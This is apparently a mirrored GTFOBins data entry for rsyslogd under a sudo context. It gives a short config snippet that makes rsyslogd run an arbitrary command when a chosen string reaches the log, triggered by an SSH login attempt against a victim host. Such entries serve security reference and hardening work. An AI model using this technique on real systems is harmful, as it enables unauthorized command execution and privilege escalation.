mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
21 lines
542 B
Plaintext
21 lines
542 B
Plaintext
---
|
|
functions:
|
|
command:
|
|
- blind: true
|
|
code: |-
|
|
cat >/path/to/temp-file <<EOF
|
|
module(load="imuxsock")
|
|
:msg, contains, "somerandomstring" ^/path/to/command
|
|
EOF
|
|
|
|
rsyslogd -f /path/to/temp-file
|
|
comment: |-
|
|
In order for this to work, one must be able to trigger one event containing the chosen string, e.g., `somerandomstring`. One possibility is to attempt to connect to the victim host via SSH, for example:
|
|
|
|
```
|
|
ssh somerandomstring@victim.com
|
|
```
|
|
contexts:
|
|
sudo:
|
|
...
|